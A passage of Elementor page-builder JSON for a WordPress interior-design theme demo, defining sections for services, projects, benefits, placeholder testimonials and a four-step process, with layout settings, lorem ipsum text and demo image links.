center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon 